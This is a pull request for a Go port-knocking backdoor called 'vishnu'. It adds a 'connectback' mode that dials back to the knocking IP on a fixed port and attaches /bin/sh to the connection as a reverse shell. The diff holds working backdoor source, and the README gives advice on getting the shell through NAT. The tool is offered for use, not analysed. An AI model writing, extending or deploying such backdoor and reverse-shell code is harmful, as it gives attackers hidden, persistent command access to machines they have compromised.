### PR TITLE
Reverse Shell connectback Mode

### DIFF
--- a/README.md
+++ b/README.md
@@ -19,14 +19,28 @@ After the comparison is done and matches, a random port between 100 and 65535 wi
 targetInterface is the interface you want to be listening on. To be more district, you can also change the secretPorts to whatever you want.
 
 ```
-var targetInterface = "ens160"
-var secretPorts = []int{1, 2, 3, 4}
+var (
+	targetInterface = "ens160"
+	secretPorts = []int{1, 2, 3, 4}
+)
 ```
 
 To compile, you need libpcap. On linux, you can install by running `sudo apt install libpcap-dev`. Then you can run `go build src/vishnu.go` to generate a binary.
 
 For the port opening, make sure you have `inetd` installed. If you are not sure, run `apt install openbsd-inetd`.
 
+## Connectback Shell
+
+You can optionally have the backdoor operate in connectback mode - where after successfully knocking a shell is sent back to the knocking IP on a predetermined port. 
+
+Be careful doing this behind NAT as while knocking will work, the shell won't get back to you. You'll need to do port forwarding or listen for the shell on a public IP.
+
+```
+const (
+	connectback = true
+	connectbackPort = "8080"
+)
+```
 
 # Potential future works
 * Design it to work for multiple operation systems(https://haydz.github.io/2020/07/06/Go-Windows-NIC.html )

--- a/src/vishnu.go
+++ b/src/vishnu.go
@@ -1,9 +1,11 @@
 package main
 
 import (
+	"errors"
 	"fmt"
 	"log"
 	"math/rand"
+	"net"
 	"os"
 	"os/exec"
 	"strconv"
@@ -13,11 +15,26 @@ import (
 	"github.com/google/gopacket/pcap"
 )
 
-var targetInterface = "ens160"
-var snaplen = int32(1600)
-var filter = "tcp"
-var secretPorts = []int{1, 2, 3, 4}
-var secretCounter = 0
+var (
+	targetInterface = "ens160"
+	snaplen         = int32(1600)
+	// vishnu uses tcp port knocking
+	filter = "tcp"
+	// ports in order to port knock on
+	secretPorts = []int{1, 2, 3, 4}
+	// how far into the sequence we are
+	// when secretCounter == len(secretPorts),
+	// port knocking is complete and shell is given
+	secretCounter = 0
+)
+
+const (
+	// if true, connect back to knocking
+	// IP on connectbackPort
+	connectback = false
+	// only relevant if connectback is true
+	connectbackPort = "8080"
+)
 
 func main() {
 	// Read package and analze them
@@ -36,6 +53,16 @@ func errorPrinter(err error) {
 	if err != nil {
 		log.Panicln(err)
 	}
+}
+
+func grabRemoteIP(packet gopacket.Packet) (string, error) {
+	iplayer := packet.Layer(layers.LayerTypeIPv4)
+	if iplayer == nil {
+		return "", errors.New("Packet is not IPv4")
+	}
+
+	ip, _ := iplayer.(*layers.IPv4)
+	return ip.SrcIP.String(), nil
 }
 
 func printPacketInfo(packet gopacket.Packet) {
@@ -59,9 +86,17 @@ func printPacketInfo(packet gopacket.Packet) {
 	}
 
 	if secretCounter == len(secretPorts) {
-		// open the gateway
-		go vishnu()
 		secretCounter = 0
+		// grab  IP address
+		ip, err := grabRemoteIP(packet)
+		// TODO maybe just listen if connectback is
+		// on and we can't get the remote IP
+		if connectback && err != nil {
+			return
+		}
+
+		// open the gateway
+		go vishnu(ip)
 	}
 
 	// Check for errors
@@ -70,7 +105,25 @@ func printPacketInfo(packet gopacket.Packet) {
 	}
 }
 
-func vishnu() {
+func connectBack(ip string) {
+	// TODO make this a PTY shell instead
+	addr := net.JoinHostPort(ip, connectbackPort)
+	conn, err := net.Dial("tcp", addr)
+	if err != nil {
+		// TODO: figure out error handling
+		return
+	}
+
+	cmd := exec.Command("/bin/sh")
+	cmd.Stdin, cmd.Stdout, cmd.Stderr = conn, conn, conn
+	cmd.Run()
+	conn.Close()
+}
+
+func vishnu(ip string) {
+	if connectback {
+		connectBack(ip)
+	}
 	randomPort := rand.Intn(65535-100) + 100
 	// println("The doors are open on port ", strconv.Itoa(randomPort))
 	// Append to a file /etc/inetd.conf


### PR DESCRIPTION
Optionally get a reverse shell sent back to the knocking IP address on a predetermined port.

```go
const (
         connectback = true
         connectbackPort = "8080"
)
```

This could also be dynamically set according to some algorithm like you mentioned for the knocking ports in the README.

I have a few ideas for the dynamic generation that we could take offline.